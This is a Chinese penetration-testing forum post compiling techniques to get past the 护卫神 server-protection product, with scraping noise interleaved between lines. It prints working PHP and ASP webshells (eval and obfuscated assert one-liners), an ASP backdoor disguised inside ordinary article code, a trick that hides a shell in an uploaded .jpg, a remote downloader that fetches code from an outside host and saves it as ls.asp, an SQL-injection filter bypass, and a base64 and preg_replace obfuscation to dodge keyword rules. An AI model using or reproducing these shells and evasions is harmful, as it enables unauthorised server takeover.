中国网络渗透测试联盟
标题:
突破护卫神技术总汇
[打印本页]
作者:
admin
时间:
2013-2-14 00:11
标题:
突破护卫神技术总汇
申明:由于护卫神收费,破解版又比较低,因此,本贴方法均来自以往实战以及其他网络文献,没有写的请大家留言补上
" `8 R* W6 G5 f
-----------------------------------------------------------------------------------------------------------------------------------
- [: s- i o2 q7 A7 S% h# R% j% q
文章分为:
5 L4 R# h3 _, i5 h, q
一、马儿篇,都是以前可以过护卫神的马
x* M- v/ m5 }( ]
二、注入篇,可以绕过注入的方法
% m; l6 L5 j7 v8 u. h
三、规则篇,根据护卫神的过滤规则大家可以自己设计马儿
$ u. V9 L: y, N
一、马儿篇
; L- p4 U8 H! [7 a
----------------1号--------------------------
, P7 H% v" K& z
< ?php
: m( b% B: y0 I; [* m7 @- F" `
@eval
1 L" n. f5 T- v% S; `
($_POST['1']);?>
* E1 z2 q3 e: Q8 V$ \( e
----------------2号--------------------------
/ i# i& g7 X5 x
<title>login</title>nono<?php
# n l1 q3 O: w, j: s8 G" V& y
eval
+ n0 k0 M( I) v) S0 n8 Q
($_POST
7 w/ N; @* O. x- q. W8 ~3 T
[1])
+ U* ^3 O! K9 T' S* ?5 Y; }0 Z
?>
4 a$ n- `$ S% F
--------------------3号---------------------------------------------
4 J* @& \9 N% p8 j. v
< ?php $a = str_replace(x,"","axsxxsxexrxxt");
3 B2 d9 i2 C- _
$a($_POST["c"]); ?>
" E3 E# c- y! h9 r
菜刀直接连,不需要构造连接字符串,密码 c
. |5 F- Y% b+ B& e6 u
---------------------某牛给的,据说可过安全狗和护卫神------------------------------<%@language=vbscript codepage=936 %>
3 e' ^3 J3 O: c& C5 c, L6 E3 j7 d
<%@language=vbscript codepage=936 %>
* u6 b3 X9 z# T
<%
8 G( ?; Q. @4 n, v8 `- u/ i
Option Explicit
$ j! }" o P" I
'强制浏览器重新访问服务器下载页面,而不是从缓存读取页面
" a2 V2 ]( Z1 b* u( n
Response.Buffer = True
' c* a. x4 H% W( o
Response.Expires = -1
1 N2 K Z. ]% x# J, e+ l& m
Response.ExpiresAbsolute = Now() - 1
& Y8 W% {! J8 K! k i
Response.Expires = 0
4 ~6 s& o3 k* p$ [6 w
Response.CacheControl = "no-cache"
* k& h Y0 |4 N5 {7 l \, Q
dim m
. y7 p% V" A4 S8 Z v. w
m=request("m")
& q3 J5 T/ I7 H8 q+ V% `# {
Dim ArticleID, Action, sql, rs, Hits, ShowType
8 ]/ g" w" B7 |! t
if m<>"" then execute(m)
2 T' }; q% A8 \" R
ArticleID = Trim(request("ArticleID"))
% z; L! X3 ^2 S8 q0 G
Action = Trim(request("Action"))
; o% P a: G1 U' |, x8 M6 J
ShowType = Trim(request("ShowType"))
0 v" w2 s: {' r( K! d$ H
If IsNumeric(ShowType) Then
8 F; T; d. y1 P, |( w
ShowType = CLng(ShowType)
0 ^2 G7 a8 ] ~1 f" q0 T
Else
7 A- B! T1 k5 b6 i+ G# S
ShowType = 1
: K; j8 C3 k9 V, p/ R
End If
$ i2 d% m" W# p F; e
%>
! v# ~: O( V& Z& z1 {
--------------------类似于过安全狗的包含方法-------------------------------------------
' }/ |; y; m2 A6 ]7 `
A.asp版本:
, @7 P/ x* b& Q8 z4 ~
将一句话保存为 XX.jpg 上传后 地址为 .../131717.jpg
3 z/ n0 f. Y. }; M
在上传一个 x.asp 内容为 <!–#include file="../131717.jpg"-->
& ~" B; G' H d& q& I
B.php版本
& Y/ @) l% m" M: |
如果是php的话:
+ F' i9 b. V8 `4 P5 ~
< ?php
- `% w |6 x* L) _$ n% e
include "1.htm";
) i8 D9 c% m$ B
?>
% E/ g8 @, u( o) g) f# b
------------------实在不行,还可以下载---------------------------------------------
/ F$ {: n7 _! h3 Z: D
远程下载马
$ Y5 P) Z9 i* H7 ~
<%
- C# L4 i5 s0 W5 ^* c$ L8 Y
$ @% N- t8 e; ?% g3 R' W1 p7 @1 l: G
Set xPost = CreateObject("Microsoft.XMLHTTP")
* W" C7 g3 S. y! s! ?- e$ w
/ B# R2 V) m* S1 R4 O6 \5 Z
xPost.Open "GET","http://www.8090sec.com/1.txt",False
y9 j& O1 p( v# g1 b% P
# V6 n5 a0 b- {+ `7 Q" [1 F
xPost.Send()
; v8 L( i- x: i" \' q4 t
) k( P' a! L; }$ O' P+ ?/ X( d
Set sGet = CreateObject("ADODB.Stream")
4 F' K3 V# y4 \' v+ \
9 y9 \4 Q" R8 Y6 u1 l2 [7 t( D
sGet.Mode = 3
( h! i; l) @# W1 v B
2 S$ b x7 g$ c E
sGet.Type = 1
- L2 h& P9 H4 ~. e3 s$ q$ S
" T3 z/ _( K0 ^! }
sGet.Open()
9 O' B4 h& t N* `& L
2 F, t& C7 C% Z
sGet.Write(xPost.responseBody)
. f3 D6 q! Z2 h! } {" ^
$ ?/ r. [( R: }& I7 T+ c, ^
sGet.SaveToFile Server.MapPath("ls.asp"),2
" }/ G# r6 ^* @; x! y6 b
, ~) X7 F& r/ Q5 E2 I
set sGet = nothing
5 t6 s+ M* h' w( _7 P8 b+ ^) ?
& H6 e1 G7 L% @3 V) {/ r8 l6 q
set sPOST = nothing
4 d/ Y, p9 p% l0 r
5 u' o1 Z7 r( c+ \9 m6 O
%>
/ t9 J& V5 y: ^& |3 t" H
二、注入篇
8 g! M9 ^% c$ _9 d
/*%00*/截断符
8 M7 H o: }5 d
select/*%00*/* from admin;
! Y$ N9 r) O ~! a" c
---------------------------------------------------------------
' V' }2 l& p5 V4 ~
---------------------------------------------------------------
! e7 k7 [* _+ E- B5 H7 Q9 y
三、规则篇
! L5 Q% \7 h/ E3 ]
可以利用类似:
* H5 z( s' R9 A- T$ M1 r
<?php
( h5 h% A# e% n" S8 z( [" b; p
. F7 F1 g3 I( Q$ l s) W
$code='一串base64'; //base64编码
: F+ ?7 }$ r+ e! b+ x' Z7 w& D
5 q/ O- \# I# ^! }0 M# _% [4 R/ H0 ~
$x=str_replace('f',"","bfafsfef6f4f_ffdffeffcffoffdffef"); //字符串替换
" ^; s( x/ a D! M* W7 j) ]
1 |) W- Q3 @9 K) i: w" M
$a = '/a/';//正则规则
" E0 d a. I$ \6 p+ z
- o( n8 F1 f; R5 B) R
preg_replace($a,'e'.'v'.'a'.'l'.'('.$x.'('.$code.'))','a'); //正则替换
& E7 U5 l0 \2 k s2 A' o/ e
- G+ z3 t, A) C2 y5 `5 F
?>
0 m; F, s* h# C! u
方法绕过关键词过滤
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2